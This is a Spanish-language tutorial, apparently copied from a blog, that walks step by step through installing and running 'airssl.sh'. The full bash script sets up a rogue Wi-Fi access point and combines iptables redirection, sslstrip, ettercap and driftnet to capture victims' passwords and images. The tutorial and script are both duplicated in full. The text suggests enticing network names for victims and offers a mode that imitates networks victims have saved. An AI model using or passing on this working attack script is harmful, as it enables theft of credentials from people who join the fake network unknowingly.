Fuente http://iwconfig.wordpress.com/2011/08/18/acces-point-falso-caputra-de-password-mitm/
Requerimientos
El script requiere que tengas como minimo 1 WNIC (wireless network interface card) para realizar el broadcast del falso AP, y otro WNIC/NIC que se encuentre conectado a internet.
Alguna version de Backtrak instalado y corriendo.
Para realizar este tutorial eth1 estara conectado a internet y utilizaremos wlan0 para hacer el boradcast. Airssl configura manualmente el ipforwarding.
Ettercap instalado
Instalando airssl
1. Click derecho en el escritorio y seleccionamos “create new file”, elegimos “text file” y finalmente elegimos de nombre airssl.sh
2. Copiamos el script que se encuentra en esta entrada.
3. Abrimos el archivo airssl.sh con el Kate u algun editor de textos.
4. Pegamos el script presionando “ctr+v” y guardamos la modificacion.
5. Abrimos una terminal y escribimos:
chmod 755 /root/airssl.sh
(o en la hubicacion que se encuentre /tuubicacion/airssl.sh)
6. Ahora abrimos otra terminal y escribimos:
/root/airssl.sh
Y deberian ver
AIRSSL 2.0 - Credits killadaninja & G60Jon
Eso significa que el script esta corriendo.
La primer pregunta que airssl realiza es:
Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
Debajo de la pregunta airssl ya nos muestra la respuesta:
AIRSSL 2.0 - Credits killadaninja & G60Jon
0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 eth1
Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
Para los que no saben el gatwaay seria nuestro modem/router que nos da internet. Por lo cual escribimos 192.168.0.1 y presionamos enter.
La siguiente pregunta es
Enter your interface that is connected to the internet, this should be listed above. For example eth1:
Aqui debemos poner la interface donde estamos conectados a internet, en este caso eth1. Si no lo saben y es por wifi prueben con:
iwconfig
Si es por lan
ifconfig
La siguiente pregunta es:
Enter your interface to be used for the fake AP, for example wlan0:
Aqui ingresamos la interface donde esta el Wi-Fi que vamos a utilizar para el AP, si no estas seguro tipeamos:
airmon-ng
En mi caso es:
Interface Chipset Driver
eth1 Broadcom wl
wlan0 RTL8187 rtl8187 - [phy0]
eth1 es la interface que esta coenctada a internet, vamos a utilizar en este caso wlan0 para el AP. Escribimos wlan0 y presionamos enter.
La proxima pregunta es:
Enter the ESSID you would like your rogue AP to be called
Ingresamos el nombre de la coneccion Wi-Fi, que sera vista por las victimas.
En estos casos esta bueno poner un nombre llamativo como “Internet para todos” o “McInternet”. En nuestro caso se va a llamar “Freewifi”.
Escribimos Freewifi y presionamos enter.
La proxima pregunta es:
Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?
Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A
Escribimos “n” y presionamos enter. Si quieren saber para que sirve ingresen a airbase-ng faq
airssl mostrara algunas lineas y abrira una ventana de xterm. Luego seguira con la siguiente pregunta:
Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N
Volvemos a ingresar “n” y presionamos enter.
La proxima pregunta es:
Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower)
Y or N
Para esta opcion escribimo “n” tambien, dado que no nos interesa tomar una foto del browser de la victima. En caso de que les sea util, la imagen sera guardada en /pentest/wireless/airssl/driftftnetdata.
Como ultima ventana veremos:
[+] Activated...
Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata
[+] IMPORTANT...
After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR
Si todo esta bien, podran probar con alguna Pc o Dispositivo de conectarse en el acces point que acabamos de crear. Desde la pc de prueba ingresen a un site que utilize SSL para probar de ver las credenciales en el ettercap. Este ataque tambien guardara contraseñas guardadas en el ettercap.
PaRA CERRAR escriban “y” y presionen ENTER, sino pueden tener problemas.
SCRIPT
#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name ""$ESSID"";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}" > /pentest/wireless/airssl/dhcpd.conf
# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
read ANSWER
if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi
if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3
# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi
if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use ""interface type"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi
if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi
# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT
if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."
kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit
fi
exit
Requerimientos
El script requiere que tengas como minimo 1 WNIC (wireless network interface card) para realizar el broadcast del falso AP, y otro WNIC/NIC que se encuentre conectado a internet.
Alguna version de Backtrak instalado y corriendo.
Para realizar este tutorial eth1 estara conectado a internet y utilizaremos wlan0 para hacer el boradcast. Airssl configura manualmente el ipforwarding.
Ettercap instalado
Instalando airssl
1. Click derecho en el escritorio y seleccionamos “create new file”, elegimos “text file” y finalmente elegimos de nombre airssl.sh
2. Copiamos el script que se encuentra en esta entrada.
3. Abrimos el archivo airssl.sh con el Kate u algun editor de textos.
4. Pegamos el script presionando “ctr+v” y guardamos la modificacion.
5. Abrimos una terminal y escribimos:
chmod 755 /root/airssl.sh
(o en la hubicacion que se encuentre /tuubicacion/airssl.sh)
6. Ahora abrimos otra terminal y escribimos:
/root/airssl.sh
Y deberian ver
AIRSSL 2.0 - Credits killadaninja & G60Jon
Eso significa que el script esta corriendo.
La primer pregunta que airssl realiza es:
Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
Debajo de la pregunta airssl ya nos muestra la respuesta:
AIRSSL 2.0 - Credits killadaninja & G60Jon
0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 eth1
Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
Para los que no saben el gatwaay seria nuestro modem/router que nos da internet. Por lo cual escribimos 192.168.0.1 y presionamos enter.
La siguiente pregunta es
Enter your interface that is connected to the internet, this should be listed above. For example eth1:
Aqui debemos poner la interface donde estamos conectados a internet, en este caso eth1. Si no lo saben y es por wifi prueben con:
iwconfig
Si es por lan
ifconfig
La siguiente pregunta es:
Enter your interface to be used for the fake AP, for example wlan0:
Aqui ingresamos la interface donde esta el Wi-Fi que vamos a utilizar para el AP, si no estas seguro tipeamos:
airmon-ng
En mi caso es:
Interface Chipset Driver
eth1 Broadcom wl
wlan0 RTL8187 rtl8187 - [phy0]
eth1 es la interface que esta coenctada a internet, vamos a utilizar en este caso wlan0 para el AP. Escribimos wlan0 y presionamos enter.
La proxima pregunta es:
Enter the ESSID you would like your rogue AP to be called
Ingresamos el nombre de la coneccion Wi-Fi, que sera vista por las victimas.
En estos casos esta bueno poner un nombre llamativo como “Internet para todos” o “McInternet”. En nuestro caso se va a llamar “Freewifi”.
Escribimos Freewifi y presionamos enter.
La proxima pregunta es:
Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?
Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A
Escribimos “n” y presionamos enter. Si quieren saber para que sirve ingresen a airbase-ng faq
airssl mostrara algunas lineas y abrira una ventana de xterm. Luego seguira con la siguiente pregunta:
Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N
Volvemos a ingresar “n” y presionamos enter.
La proxima pregunta es:
Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower)
Y or N
Para esta opcion escribimo “n” tambien, dado que no nos interesa tomar una foto del browser de la victima. En caso de que les sea util, la imagen sera guardada en /pentest/wireless/airssl/driftftnetdata.
Como ultima ventana veremos:
[+] Activated...
Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata
[+] IMPORTANT...
After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR
Si todo esta bien, podran probar con alguna Pc o Dispositivo de conectarse en el acces point que acabamos de crear. Desde la pc de prueba ingresen a un site que utilize SSL para probar de ver las credenciales en el ettercap. Este ataque tambien guardara contraseñas guardadas en el ettercap.
PaRA CERRAR escriban “y” y presionen ENTER, sino pueden tener problemas.
SCRIPT
#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name ""$ESSID"";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}" > /pentest/wireless/airssl/dhcpd.conf
# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
read ANSWER
if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi
if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3
# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi
if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use ""interface type"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi
if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi
# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT
if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."
kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit
fi
exit